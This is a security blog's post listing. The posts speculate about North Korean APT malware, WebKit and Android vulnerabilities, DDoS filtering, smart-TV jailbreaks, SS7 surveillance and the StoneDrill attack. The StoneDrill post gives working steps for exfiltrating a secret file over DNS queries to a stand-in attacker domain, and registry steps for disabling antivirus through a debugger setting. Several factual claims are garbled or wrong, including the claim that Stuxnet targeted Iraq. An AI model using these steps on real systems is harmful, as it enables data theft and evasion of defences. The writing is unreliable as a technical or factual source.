All posts by admin

Application Development, Network (Protocol, Topology & Standard), System

Vulnerabilities in the old OLE2-based HWP file format – engages APT attacks to South Korea

146 Comments

North Korea’s rising ambition seen in bid to breach global banks

My reflection on CNBC News (North Korea’s rising ambition seen in bid to breach global banks) and written down comments below:

Preface:

The overall situation looks extreme today no matter political or commercial. From commercial area, enterprise try to monopolize on market. From country to country, conflicts of interest in natural resources. My personal feeling was that the ownership of the non develop areas better belongs to natural instead of country. For sure that not only limit to Antarctica! Above description not intend to divert (side-track) your attention. Since the terms benefits or interest change the whole world. Yes,  human being go for survival, money is the key factor. And such away create the criminal activities and conflict of interest.

Electronic age made the overall situation more complex

Electronic age made the overall situation more complex especially banking industry. The evidence was told that that even though Mira DDOS, IOT Botnet and Zombie types of cyber attacks not causes banking industries lost the money in their drawer. However the insider threats especially trojan and malware which lets the finanical institution lost huge amount of money (For instance Bangladesh heist). Furthermore cyber espionage infiltrate activities most likely relies on malware and Trojan. The best example can quotes is the Stuxnet malware. The goal of Stuxnet intend to disturb the operations of nuclear facilities in Iraq.

From technical point of view, malware belongs to monitor (surveillance) and control of tool. The huge group of survillaince program must utilize malware as a infection media. Sounds like the APT (advanced persistent threat) is the descendants of the malware.

The term kill chain was originally used as a military concept related to the structure of an attack; … Since then, the “cyber kill chain” has been adopted by data security organizations to define stages of cyber-attacks (see below picture diagram)

Regarding to the definition of APT show on wikipedia . An APT usually targets either private organizations, states or both for business or political motives. APT processes require a high degree of covertness over a long period of time.  From criminal activities point of view, hacker most likely will collect the credential, personal details and database in the long run. For the criminal case like steal the money in electronic payment system, it is rare on APT type of attack.

Does APT equal to criminal activities in commercial world?

Observation – FBI stated that SONY INTRUSION and banking environment insider threats (banking malware) are the conspiracy of the North Korea government.

Why do we believe the perpetrator is North Korea?

The official statements from the FBI and US-CERT found the malware and disclose their md5 hashes for reference.

Dropper = d1c27ee7ce18675974edf42d4eea25c6
wiper = 760c35a80d758f032d02cf4db12d3e55
Web server = e1864a55d5ccb76af4bf7a0ae16279ba
Backdoor = e904bf93403c0fb08b9683a9e858c73e

Since the attack target of this malware exactly Microsoft windows platform. Base on definition of fair proof, I select and highlight Microsoft information details for reference.

Microsoft Backdoor:Win32/Escad.AA!dha

This threat can give a malicious hacker access and control of your PC. They can then perform a number of actions, including downloading other malware. But as usual Microsoft’s not intend to provides the suspicious source IP address list.

Remark: Per Norse Corp information, the malware was signed with a compromised Sony certificate.

The cyber defense solution provider found more details of this malware on Sep 2013. The malware activities looks came from Jilin Province Network and Liaoning Province Network. The security expert believed that the command & control may came from North Korea. Since Jilin and Liaoning provides the Internet services to North Korea. This malware so called Kimsuki malware.

Transformation – file type format convert weaponized File format

Vulnerabilities in the old OLE2-based HWP file format

What is an HWP file?

HWP documents are document files specialized in the Korean language and OLE2based document format similar to Microsoft’s 97-2003 Microsoft document. The file format created by the South Korean company Hancom. HWP files are similar to MS Word’s DOCX files, except that they can contain Korean written language, making it one of the standard document formats used by the South Korean government.

Design weakness of HWP files:

Para text is a data record type that stores the content of each paragraph in body text. When parsing a para text tag within an .hwpx file, a logic error in hwpapp.dll results in a type confusion scenario. When paired with an appropriate heap spray, this vulnerability can affect code execution.

Remark: In computer security, heap spraying is a technique used in exploits to facilitate arbitrary code execution. The part of the source code of an exploit that implements this technique is called a heap spray. In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process’s heap and fill the bytes in these blocks with the right values.

2013 – Kimsuki malware design objective(OLE2-based HWP file format + APT) : Targets Critical Infrastructures and Industrial Control Systems (ICS)

2016 – Onion Dog, APT Focused On the Energy and Transportation Industries in Korean-language Countries

OnionDog malware is transmitted by taking advantage of the vulnerability of the popular office software Hangul in Korean-language countries, and it attacked network-isolated targets through a USB Worm. OnionDog APT targets Critical Infrastructures and Industrial Control Systems (ICS)

Overall comment:

Since North Korea ruler as a dictator control their country. Developing nuclear bomb,  test the missile looks show his power to the world. From psychological point of view, it is easy to understand his goal to enagaged APT attack. Since the dictator would like to emulate his imaginary enemy (USA) to destroy the nuclear power energy facilities from his enemy. However I remain to reserve my opinion that he is the lord behind the seen to engage the banking malware attack in foreign country except south Korea?

Reference to Korea CSIS report:

  1. 2011 – Denial-of-service(DDoS)attacks on websites, the first major cyber-attack attributed to North Korea was on April 12, 2011, which paralyzed online banking and credit card services of Nonghyup Agricultural Bank for its 30 million customers.
  2. 2013 – Advanced persistent threat campaigns, and employment of less sophisticated but sufficiently effective malware such as the Jokra wiper tool observed on March 20, 2013. South Korean media reports that North Korea has started to target smartphones as well.

For more detail, please refer to below url for reference.

What Do We Know About Past North Korean Cyber Attacks and T heir Capabilities ?

 

Cell Phone (iPhone, Android, windows mobile), Network (Protocol, Topology & Standard), System

Apple icloud security burden – Webkit looks like a culprit! (Mar 2017)

290 Comments

Apple developers work hard on  iCloud security to improve the security. They are in an effort to encourage adoption of the two factor authentication standard. Since Apple device did a good job in end point device so far. And therefore it such a way reduces of inherent risks. However it is hard to avoid the vulnerability happen on application side since development source code is open. Apart from that it is hard to refuse the open source application deployment.

As we know a Apple release security patches on 23rd Jan 2017, a common vulnerability criteria focus on a web component. Yes, it is WebKit. Let start the story from scratch.  Be my guest. Let’s start the journey!

Why Use WebKit?

Some applications are full-featured browsers, but more often applications embed web content as a convenience, as in a custom document system. WebKit is a layout engine software component for rendering web pages in web browsers.

Since found a flaw on WebKit,  a rogue web page can crash the browser because all code runs in the same process. New version of webkit (Webkit2) enhance Safari architecture. It aim to avoid this design limitation. It enforce to separate the code into two different processes. That is User Interface and web page process maintain their specify process. Below detail shown that how Webkit 2 architecture improve the Safari process isolation feature.

 

As times goes by, Webkit features like a major component embedded in web browser (see below).

However it bring up cyber security world concern on 2012. A heap memory buffer overflow vulnerability exists within the WebKit’ JavaScriptCore JSArray::sort(…) method.

This design limitation accepts the user-defined JavaScript function and calls it from the native code to compare array items.
If this compare function reduces array length, then the trailing array items will be written outside the “m_storage->m_vector[]” buffer, which leads to the heap memory corruption. At this time, you may ask, does the webkit or webkit 2 design flaw only apply to Apple devices? I believe that it apply to all different brand name of vendors which make use of webkit or webkit2.

The exploit was due to an heap buffer overflow issue in JavaScriptCore JSArray::Sort() method. Below details of program syntax will bring you an idea in this regard.

Cyber attack transformation = Attack from local device to Virtual server machine.

Hacker looks exploits the vulnerability of WEBKIT, a weakness hints that hacker can transform the ROP(return oriented programming) as attack weapon. A technical article published by IEEE records the following scenario.

Important: An approach to attack on the Xen hypervisor utilizing return-oriented programming (ROP). It modifies the data in the hypervisor that controls whether a VM is privileged or not and thus can escalate the privilege of an unprivileged domain (domU) at run time. As ROP technique makes use of existed code to implement attack, not modifying or injecting any code, it can bypass the integrity protections that base on code measurement. By constructing such kind of attack at the virtualization layer.

Sounds horrible on above matters! Why? If such hacker technique develop in advance. So the virtual machine run on cloud farm will become a victim.  Hey, same scenario looks possible happened in iCloud. The side effect is that it is not only compromise a single icloud container (single device), it effect the whole unit of icloud. Below IEEE technical article highlight is the proof of concept. If you are interest, please do a walk-through of this document highlight. I am afraid that this article might have copyright. And therefore not going to copy all the articles. Should you have any interest, please visit IEEE publisher web site to find out more.

A rumour concerning “rumblings of a massive (40 million) data breach at Apple.” Believe it or not? In the meantime, if you are the apple fans, you must re-confirm all the patches provided by Apple Corp.  Keep run don’t stop! For more details, please refer to below url for reference.

Reference:

iCloud for Windows 6.1.1

The latest software updates from Apple

 

 

 

 

 

 

 

 

 

 

 

Application Development, Cell Phone (iPhone, Android, windows mobile), Network (Protocol, Topology & Standard), System

DDOS never expire! A powerful tool for political and economic weapon (Part 1)

129 Comments

We heard DDOS term till 80’s. The foundation of attack given from network layer (OSI layer 3) till today application layer (OSI layer 7). Since 2010 a mobile computing trend leads BYOD (Bring your own device) terminology and carry out more serious distribution denial of services. A public DNS incident occured last year (2016) exposed IoT type style distribution denial of services. If you still remember , security expert forseen that ransomware  is going to replace DDOS soon. It looks that the statement not totally correct.  The truth is that cyber arsenal virtually categorizes the weapons into different categories (see below).

Denial of IT Services categories Source of attack Technical (Naming convention) Destination of attack Benefits of attacker Side Effect
End user computing
 1. DDOS (SYN Flood)
2. DOS (SYN Flood)		 Network layer (OSI layer 3) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS (UDP Flood)
2. DOS (UDP Flood)
 Network layer (OSI layer 3) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS (ICMP Flood)
2. DOS (ICMP Flood)		 Network layer (OSI layer 3) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS attack focused on Web applications vulnerabilities
2. DOS attack focused on Web applications vulnerabilities		 Application layer (OSI layer 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS attack focused on Operating system vulnerabilities
2. DOS attack focused on Operating system vulnerabilities		 Application layer (OSI layer 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
Compromised web site, email phishing attached with file or url embedded malicious code Application layer (files and OS) – Attack trigger by ransomware which cause files lock (encrypted) 1. Operating system and files
2. End user computing		 Bitcoin (money) Bring disruption to satisfy objective (focus on business world instead of political reasons)

Information supplement (BYOD and IoT)

Denial of IT Services categories Source of attack Technical (Naming convention) Destination of attack Benefits of attacker Side Effect
BYOD (mobile phones) Botnet – so called vampire cyber soldier Both network and application layer (OSI 3 & 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
IoT (Internet of things includes, web cam, car automation, home appliance, Smart TV and smart electronics device) IoT (Botnet) – so called descendant of vampire cyber soldier Both network and application layer (OSI 3 & 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)

Yes, this topic might bring interests to reader. Ok, let’s join together to this journey (DDOS never expire – A powerful political and economic weapon (Part 1)).

Is there a way to identify attacker traffics? Yes, it can but it seems out of control now! BYOD and IoT technology are the accomplice!

As far as we know, the earlier stage of DDOS and DOS attack keen to make use of random source to increase the difficulties of the defense. A technical term so called Random Spoofed Source Address Distributed Denial of Service Attack (RSSA-DDOS)

Let recall different types of avoidance mechanism to avoid classic DDOS. There are total 3 types of filter can avoid classic DDOS happened on network layer.  For more details, please see below:

  1. Ingress filtering
  2. Egress filtering
  3. Router-based filtering

However above 3 types of prevention mechanisms not able to avoidance of RSSA-DDOS. The drawback is that those solution encounter difficulties to distinguish between legitimate traffic and attack traffic in effective way.

Dawn appears only for short time (FSAD & ECBF)

Filtering based on the source address distributed feature – FSAD

Solution:

  1. Detection of attack occurred and according to the current attack scale, historical flow and source address recognition accuracy requirements. Set the appropriate legal address identification
    parameter.
  2. 2. Identify the legal source address and saved to the legal address table (LAT)

But how to identify the counterfeit source IP address

A solution named “The Extended Counting Bloom Filter -ECBF” can do the magic.
Example:
Assuming that a packet is received, the source address Saddr is (a.b.c.d) > 1.1.1.1
The source address Saddr is (a.b.c.d), then

• IPH(Saddr)=256×a+b;
• IPM(Saddr)=256×b+c;
• IPL (Saddr)=256×c+d;
• IPLH(Saddr)=256×d+a.

The ECBF contains four hash codes for counting the number of source address packets number and array. Each array corresponds to a hash function (see below)

It is easy to see that each element of the ECBF corresponds to 2 16 source addresses. For example, the 257th cell of the A 1 array corresponds to the source address (1.1.x.y)
According to the packet, where x and y are any number between 0 and 255. And each time a packet is received, the four cell values corresponding to the packet source address
Then add 1 for A 1 [256 × a + b], A 2 [256 × b + c], A 3 [256 × c + d] and A 4 [256 × d + a], respectively.
 See below diagram will receive a high-level understanding.
Legitimate address identifying algorithm under random spoofed source address DDoS attacks (see below):
Set identifying time interval and threshold T;
while(1)
Receive a packet;
Get source ip address sip;
Record sip in ecbf;
If (every element’s value of sip in 4 arrays>T)
Sip is a legitimate address;
fi;
if (time interval is over)
Empty 4 arrays;
Start a new time interval;
fi;
End while;
 IoT Botnet appears then triggers DDOS make the Cyber world crazy!
Above filter base defense mechanism and integrity identification method looks insufficient when IoT Botnet join to cyber war. Recently headline news stated that Mirai botnet turning internet of things into botnet of things. See how serious of this attack effected cyber world!
Mirai botnet on volume amount basis break through advanced defense mechanism. It look likes a cyber soldiers listen to the instruction of C&C server to attack the enemy. As a matter of fact, the cyber incident historical record last year proven that above imagination not a assumption. This is a real story.
References:
Oct 2016 – Dyn cyberattack: the attack involved “10s of millions of IP addresses (DDOS suspects – Mirai)
2016 – A massive DDoS cyber attack that disabled many online sites during the American presidential election (DDOS suspects – unknown)
2017 – The citizens of Hong Kong looking for True, Fair & Free Election, however the democratic websites operate in frequently encountered DDOS during important events (DDOS suspects – unknown)
Above 3 items of incident can tell us DDOS attack never expire. Sounds like the attack is under transformation. DDOS attack from begin focus on commercial world expands to other non commercial area. The attacks methodology enhance by internet of things and become powerful. The additional target added foreign government and democratic world.

 

Since this discussion overtime and looks bulky. Let’s continue our discussion on Part 2 next time (DDOS never expire! A powerful tool for political and economic weapon). Stayed tuned.

 

 

 

 

 

 

 

 

 

System

Next vulnerable operating system! Not Microsoft, Linux but it is Tizen.

151 Comments

Heads up by  Vault 7 CIA scandal topic on Wikileak. Last time we are talking about the high level overview of Samsung TV vulnerabilities for home user and hospitality industry.

http://www.antihackingonline.com/cell-phone-iphone-android-windows-mobile/voyeur-vs-surveillance-immoral-or-civil-governance/

We did not discuss technical information last time, since this is a quite interested topic. Let’s take this opportunity see whether we can find out more details in this area. Linux and Microsoft operating system cover up the computer market more than 30 years . Microsoft server and workstation market share are the biggest in business enterprise market exclude the BYOD and IoT markets.  Since windows OS and traditional linux OS are bulky. Whereby hardware manufactures would like to develop their operating system. Apple hardware we all known using their proprietary iOS. Android and IoT devices more preferred linux  environment.  Tizen is a open source mobile operating system. It is developed by the alliance of Linux Foundation, LiMo Foundation, Intel, Samsung and Sprint Nextel. It supports the ARM and x86 platforms. The Tizen source code is available for download as it is a open source project. From technical point of view, Tizen operating system looks possible to replace OS platform for BYOD and IoT devices market soon.  Meanwhile Tizen operating system have his own fundamental design limitation and weakness. Hackers or governance enforcement team can relies on this alleged design limitation and weakness to compromise the device. As a matter of fact, jailbreak activities popular since Apple iPhone century. We can seen that there are numbers of jailbreak technique available on the market includes Nintendo, Sony and Microsoft electronic game devices and mobile phone. But who is the accomplice of this activities? We believed that it is given by open source!

 

About the situation of Jailbreak Smart TV on the market

Understanding of Tizen OS architecture

Tizen is an operating system based on the Linux kernel and the GNU C Library implementing the Linux API. New model of Samsung Smart TV  is running on top of TizenOS platform.The Tizen OS architecture shown as below:

About jailbreak methodology and official define usage angle

As usual, the traditional jail break method relies on physical USB serial adapter cable. A security expert did a proof of concept on LG smart TV.  The experiment proof that it is easily to hack your LG TV with an adruino card via uploading  scripts. Mike Stevans is the professor of ethical hacking course in México. He explains that libLGTV_serial is a Python library to control LG TVs (or monitors with serial ports) via their serial (RS232) port.  Therefore you can use this method to hack into TV mode and root it.  From hardware manufacture policy, end user are allow to customize the firmware. LG smart TV users are can download old firmware’s from official LG websites or for Internet forums. These firmware’s are customized as per user needs. Since manufacturer define a open standard policy on their products. This policy benefits for product development since more input idea and solutions can improve and enhance the smart TV functions and features. However a group of people not limit to hacker can take the advantage of this benefits to satisfy their wants. For instance, surveillance, information collection (video and voice recording). But it is hard to judge such action is incorrect if it use to avoid crime or terrorism activities.

Wireless attack on smart TV?

Hacker found that you are able to compromise the SamSung TV by Skype application!  One of the solution is that install Skype widget on Smart TV goal reproduce Plug in authentication by pass. An authentication by-pass was discovered in the Desktop API offered by Skype whereby a local program could by-pass authentication if they identified themselves as a Skype Dashboard widget program. The smartTV app (skype) is linked directly to Tizen libraries, native libraries or Application compatibility layer (ACL) supplied libraries depending on functional, performance or hardware requirements. The architecture model of Skype application is shown as below:

Above information proof that the fundamental design of Tizen operating system contains authentication weakness. Hacker easy embedded malicious code in zip file through Skype. These can be used to copy files to any writable file system on the target and install a backdoor.

Remark: Yes, agreed that the culprit no only Tizen OS itself. Skype application contains vulnerabilities. The T9000 backdoor discovered by PaloAlto Networks is able to infect victims’ machines to steal files, take screengrabs, and records Skype conversations.

Reference: CVE-2012-1856 and CVE-2015-1641

Foreseen security Issues in Tizen OS

1 . Applications over permission

Web applications interface (API) leverage device functions by making use of the JavaScript bridge [addjavascriptinterface], program developer should be described the permission in Manifest file  ( manifest file, describing the name, version, access rights, referenced library files for the application). However device APIs inside Tizen are already defined. A concern on attack surface of over privileged Apps.

2. OS memory protection

DEP (Data Execution prevention) not enable on Tizen OS.

Address Space Layout Randomization (ASLR) function have bugs. Remark: A technical article found that all the address of heap, stack and main modules in Tizen OS was not randomize.  As a result it can’t avoid malware infection.

Conclusion:

As mentioned last time, the 1st step I finish check-in from hotel will going to do this action.

 

 

 

 

 

 

Cell Phone (iPhone, Android, windows mobile)

voyeur vs surveillance – immoral or civil governance

161 Comments

Nowadays, CCTV, webcam or even though your mobile phone camera looks involves in our life daily. Seems that the surveillance behavior is following with us once we are born on the earth. The reflections of my thinking of CIA scandal. What is the exact scandal?

Immoral or civil governance

As said, the surveillance behavior is following with us once we are born on the earth.  For instance, mum look after their child, take care of their home work and daily life. From technical point of view, such behavior looks normal without any comments said that this is governance. From technical point of view, it looks that it got the similarity of action. But for sure that this is moral.

How to identify it is an immoral action. For instance, become a voyeur. Under non criminal investigation situation, sniffing ,recording and voyeur are immoral behavior.

Wikileak document subject Vault 7: CIA Hacking Tools Revealed information bring to my attentions. Especially CIA malware targeted on smart TVs. Since the jailbreak techniques on iPhone, Android and electronic games are common. Heads up that even though SmartTV, the jailbreak on Samsung TV are the hot topics.

The interesting thing is that the jailbreak techniques covered in smartTV model deploy in hospitality  industry. It make sense to me that jailbreak for personal TV might have personal interest to enjoy more benefits but for sure that it is unsafe. However for the enterprise hospitality group it was not possible to populated a illegal feature since enterprise firm not going to take the risk. So what is the goal of this jailbreak tool?

On this discussion , I am not going to discuss the source code which I found since this is a hot topics. You can find the information anywhere. For your easy to find out the related information. Please visit below url:

https://wikileaks.org/ciav7p1/cms/page_12353643.html

Recommendation:

It is a better idea that check the brand of the smart TV installed in hotel after check in. May be you will enjoy your business or travel trip more , right?

 

 

 

Cell Phone (iPhone, Android, windows mobile), Network (Protocol, Topology & Standard), System

The culprit of the CIA’s global covert hacking program given from SS7 design limitation

269 Comments

Headline news today provides a 2nd round of reminder to the world that we are under surveillance.  Since our hero Edward Snowden heads up to the world earlier. As a result, he such a way may carry a crime of treason. To be honest , I am a little worry about of him. The fact is that the expectation of president in united stated has been changed. Good luck to him at all! If god is present, please give your son Edward’s assistance. He really need you help!

The no. of total 8761 documents posted on wikileak we are not going to discuss here. Just know this is the first full part of the series dubbed Year Zero. However we would like to bring your attention on the weakness of tel-comm industry today. And believed that this is the root causes or you can say this is a backdoor on telecommunication world. Ok, this time all we emulate as Sherlock Holmes. Let’s start.

Speculation

  1. Flaw found in ASN.1 compiler

Abstract Syntax Notation 1 (ASN.1) background:

Quick and dirty description:

In the field of telecommunications and computer networks, ASN.1 (Abstract Syntax Notation One) is a set of standards describing data representation, encoding, transmission and decoding flexible notation. It provides a formal, unambiguous and precise rules to describe independent of the specific computer hardware object structure. ASN.1 provides application and protocol developers a high-level tool, essentially a data-definition language, for defining protocol syntax and the information that an application exchanges between systems.

Vulnerability:

A flaw discovered in an ASN.1 compiler, a widely used C/C++ development tool, could have propagated code vulnerable to heap memory corruption attacks, resulting in remote code execution.

Heap memory corruption attacks

Traditional memory corruption exploit can be achieved by pointing to the injected code on the stack or heap which data resides in.

Technical information – vulnerability details

Vulnerability Note VU#790839
Objective Systems ASN1C generates code that contains a heap overflow vulnerability, for more details, please refer to below url for reference.

https://www.kb.cert.org/vuls/id/790839

Afterwards, the government agency relies on this design weakness of SS7 to track the movements of the mobile phone user anywhere in the world. From technical point of view, compromise of WhatsApp or Telegram was not direct way. Sometimes no need to install malware to the clients mobile phone. It is exact the abuses of SS7 weaknesses.

2. TCP/IP version 4 (CVE-2016-5696)

The difficult part for hacker taking over TCP connection is to guess the source port of the client and the current sequence number. A group of researchers found that open a connection to the server and send with the source of the attacker as much “RST” handshake packets with the wrong sequence mixed with a few spoofed packets. By counting how much “challenge ACK” handshake packet get returned to the attacker side.  Attacker might knowing the rate limit one can infer how much of the spoofed packets resulted in a challenge ACK to the spoofed client and thus how many of the guesses where correct. This way can quickly narrow down which values of port and sequence are correct.

 

3. Law enforcement backdoor software overview

Edward Snowden disclosed global surveillance program in 2013. We all alert that surveillance programs are flooding all around the world. Bring to tech guy attention may more or less is the sniffing technique. How was US government collect personal data and telephone call on our desktop and mobile phone devices? Tech guy with interest on cyber securities may know few hacker group assists law enforcement sector develop monitoring agent software. The brand name includes DaVinci, Morcut, Crisis & Flosax. It looks that the most famous product is the DaVinci. An Italian made surveillance software best perform a lot of actions, such as hidden file transfers, screen capturing, keystroke logging & process injection.

Interest story happened on July 2015

A cyber-surveillance company believes a government may have been behind a massive hack of its systems that saw huge chunks of its code stolen. For more details, please refer to below URL:

http://eandt.theiet.org/news/2015/jul/hacking-team-breach.cfm

After you read  this article, you may have questions? Since 2015 data breaches incidents happened in frequent. It is hard to believe that how weakness of cyber defense setup in the world. No matter how many anti defense facilities you built in your firm. Seems there is no appropriate solution to fight against cyber crime. Do you think all the incidents happened within 2015 to 2016 are related hacker code exposed in July 2015?

Reference:

Law enforcement surveillance software technical features:

Available surveillance modules
Accessed files
Address Book
Applications used
Calendar
Contacts
Device Type
Files Accessed
Keylogging
Saved Passwords
Mouse Activity (intended to defeat virtual keyboards)
Record Calls and call data
Screenshots
Take Photographs with webcam
Record Chats
Copy Clipboard
Record Audio from Microphone
With additional Voice and silence detection to conserve space
Realtime audio surveillance (“live mic:” module is only available for Windows Mobile)
Device Position
URLs Visited
Create conference calls (with a silent 3rd party)
Infect other devices (depreciated since v. 8.4)

Suggestion to reader:

Since the world situation became more complex today no matter political and people’s livelihood. A solution will let you easy to know your mobile phone status. Are you under government surveillance program?

If you are android phone user, go to playstore download a free program names SnoopSnitch. The SnoopSnitch which can warn when certain SS7 attacks occur against a phone and can detect voyeur’s jump into your phone.

Bye!

 

 

 

 

Application Development, System

Imaginations – a phantom command DNS queries activated Stone Drill attack in Saudi

157 Comments

Patrick Jane is a fictional character and the protagonist of the CBS crime drama The Mentalist, Jane is an independent consultant. It looks that sound likes you can me in Cyber world. Ha Ha.  The most interested Cyber security topics past two days is the destructive malware dubbed StoneDrill. Since the incident happened end of last year (2016). But this news allowed to expose to the world few days ago! The Famous antivirus vendor (Kaspersky Lab) analysis all the incident details and provides the detective control to the world. In our view point, all the information can research on internet. But the difficult ways is what is the infection technique on this incident. I believed that security expertise likes Kaspersky Lab and FireEye know more information but it can’t release to public.  Since we are in the discussion forum. There is no harm to become a actor in this moment. Ok, my friends. We are now Patrick Jane. Let’s to start the journey.

Shamoon 2.0 and StoneDrill background:

Shamoon 2.0 and StoneDrill are developed by different hacker groups. The finger print ( keyboard layout and the ID) found in the malware source code look likes a proof of identification. For Shamon 2.0 , Yemen language set was found  (ID: 9217 i.e.Arabic -Yemen [ar] (ar-ye)). But the StoneDrill embeds mostly Persian resource language.

Common attack target criteria:

Platform: Most likely is a Microsoft Window OS of machines.

Victim: Targeting oil and gas companies in the Middle East and also aiming towards targets in Europe, Kaspersky said.

Imaginations  – How malware fool the oil and gas company defense mechanism.

We assumed that both oil and gas company install antivirus program , Malware detector and end point content filtering (Websense and Bluecoat). But how come to let attacker implant malware to the hosts?

Hint 1:

Found PowerShell activities (Shamoon 2)

Hint 2:

Since the usage of powershell in windows OS platform is common today. Powershell looks like a accomplice.There are a lot of ways to avoid detection.

Methodology A:

DNS queries received powershell command. A unique attack called DNSMessenger uses DNS queries to carry out malicious PowerShell commands on compromised computers. The function likes RAT. This technique makes difficult to detect onto targeted systems.

File transfer via DNS

1. convert the file to be transferred via tshark into a hex stream.
Command - (xxd -p secret > file.hex)

2. Read each line from file.hex, and "transmit" it as a DNS query.
Command - (for b in `cat file.hex `; do dig $b.shell.evilexample.com; done)

3. On the DNS server, we can capture the messages via tcpdump or the query log.
Command - (tcdpump -w /tmp/dns -s0 port 53 and host system.example.com)

4. Extract the messages from the packet capture
Command - (tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt)

5. Reverse the hex encoding
Command: (xxd -r -p < receivedu.txt > keys.pgp)

Done. Hey man, File transfer via DNS you are done! 

Methodology B:

Disable Anti-Virus via Debugger Setting

1. Run regedit.exe
2. Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
3. Create a new key (example: calc.exe)
4. Create a new string value under your exe. The name of the string value is ‘Debugger’, and the value is svchost.exe (or anything)

Seems our Patrick Jane life stop here! Ha Ha, it is interesting, right? It looks that more technique can be used today to fool the defense mechanism. As said, this is only my imagination, it is a concept. A virtual scenario replay to detect what is the possible way on this malware incident. Ok, see you!

 

Cell Phone (iPhone, Android, windows mobile)

Heard that Android operating not secure anymore, but it is properly not.

96 Comments

Android phone users widely cover up mobile phone market. We understand that no hack proof devices in the world. Even though iphone iOS before 10.2.1 is vulnerable to DoS Exec Code Overflow (CVE-2017-2370). As a Android user we are not surprise Android operation system bug.  There are 2 critical bug occurs on mediaserver and surfaceflinger. A bug was found on 2014 identify that a potential memory leak in SurfaceFlinger on Android 4.4.4. Memory leak due to not complete designed or programmed applications limitation that fail to free up memory segments when they are no longer needed. Since this is design fault (bug), as time goes by bug become a vulnerability found by security expert last month. The CVE alert that attacker is able to use a specially crafted file to cause memory corruption during media file and data processing on Android 7.0. Apart from that, media server found new vulnerability. Such vulnerability also affects the libhevc library. As far as we know, to improve device security on Android 7.0. Andriod breaks up the monolithic mediaserver process into multiple processes with permissions and capabilities restricted to only those required by each process. However a design weakness causes the vulnerability located in the function that created the native handle. When passing in well-structured numFds and numInts (such as numFds = 0xffffffff, numInts = 2) to native_handle_create, you can cause the expression “sizeof (native_handle_t) + sizeof (int) * (numFds + numInts)” Integer overflow.

Below code is a proof of  concept shown that each GraphicBuffer object contains a pointer to a native handle.

native_handle_t* native_handle_create(int numFds, int numInts)
{
native_handle_t* h = malloc(
sizeof(native_handle_t) + sizeof(int)*(numFds+numInts));//———->Integer overflow position

h->version = sizeof(native_handle_t);
h->numFds = numFds;
h->numInts = numInts;
return h;
}

For details about vulnerabilities on Android. Please refer to below url for reference.

https://source.android.com/security/bulletin/2017-02-01.html

We heard that the overall comment on Android phone is not secure any more! As a matter of fact, design fault and design limitation are the element of the result. Since no prefect product was made in the world. Even though you put more time in development and staging phase can’t avoid a design fault occurs in your product. Yes, agree, shorten the development life cycle will hits the design fault encounter in frequent way. However modern mobile phone world integrate with Multi-application and functions. Sometime a 3rd party application will integrate into your mobile phone. Thus Andriod 7 contains defense mechanism to protect memory space and Kernel environment. But what is the fact causes the operating system still vulnerable? Ok, Let go together on this journey to elaborate more techincal details in this regard.

The evolution of Android 7.0

Android 7.0 includes a variety of system and API behavior changes.

Battery and Memory
Background Optimizations
Permissions Changes
Sharing Files Between Apps
Accessibility Improvements
NDK Apps Linking to Platform Libraries
Check if your app uses private libraries
TLS/SSL Default Configuration Changes

On above feature enhancement, it looks that the improvement on new version of Android looks fine.  As said, no prefect product design in the world.  On the other way of thinking, what if we become a hacker. On above items, which part will become vulnerable or weakness let attacker compromise the phone?

Observational standpoint:

Point 1: (Sharing Files Between Apps)

Regarding to technical details written on technical documentation. For apps targeting Android 7.0, the Android framework enforces the StrictMode API policy that prohibits exposing file:// URIs outside your app. If an intent containing a file URI leaves your app, the app fails with a FileUriExposedException exception. To share files between applications, you should send a content:// URI and grant a temporary access permission on the URI. The easiest way to grant this permission is by using the FileProvider class.

Side effect of Point 1 – Hacker can make use of File Provider class feature try to dig out the mobile phone data. The easy way is embedded a malicious program script in 3rd party application.  Fool the user to click the button (accept sharing files between apps) during software installation. Since many mobile phone users are smart today, but still have many people fall down to this trap.

Point 2: (Memory)

Both the Android Runtime (ART) and Dalvik virtual machine perform routine garbage collection, this does not mean you can ignore when and where your app allocates and releases memory. Software designer need to avoid introducing memory leaks, usually caused by holding onto object references in static memory variables, and release any Reference objects at the appropriate time as defined by lifecycle callbacks.

Side effect of Point 2 – The easiest way to leak an Activity is by defining a static variable inside the class definition of the Activity and then setting it to the running instance of that Activity. If this reference is not cleared before the Activity’s lifecycle completes, the Activity will be leaked. So all depends on mobile apps developer design. It is hard to avoid memory leak. As you know, what is the defect of memory leak? Hacker relies on this error can implant malware.

Point 3: (Background Optimizations)

ART (Android run-time)

Starting with Android 5.0, Android Runtime (ART) replaces Dalvik as the default virtual machine in the system.

 

Reference: The Dalvik Virtual Machine (Dalvik VM)

The Android platform leverages the Dalvik Virtual machine (Dalvik VM) for memory, security, device, and process management. Application designer can think of the Dalvik VM as a box that provides the necessary environment for you to execute an Android application sans, and therefore not to worry about the target device (mobile phone system).

Side effect of Point 3 – ART became the default runtime. While Dalvik relies on interpretation and just-in-time compilation, ART precompiles app Dalvik bytecode into native code.  The command responsible for compiling an application into OAT is dex2oat, which can be found in /system/bindex2oat. All mobile apps will be compiled every time the device’s system is upgraded or the first time it is booted up after it is purchased. So attacker might have way to use dex2oat to generate OAT files from modified versions of installed apps or system frameworks and replace the original OAT files with them. This is the famous attack hiding behind Android Runtime. Yes, compile method sounds like jail break of the mobile phone device. Even though iPhone can’t avoid. And therefore I still believe Android security not such poor because no products on the market can say it is hackproof.

Remark: Did you heard that hacker prepare scam email lure the user to upgrade their Android phone. It is the similar case which bring with my concerns.

Reference: Critical vulnerabilities on iPhone and Android found on Feb 2017.

Apple » Iphone IOS
score Publish Date Update Date
CVE-2017-2370 9.3 DoS Exec Code Overflow 2017-02-20 2017-02-22
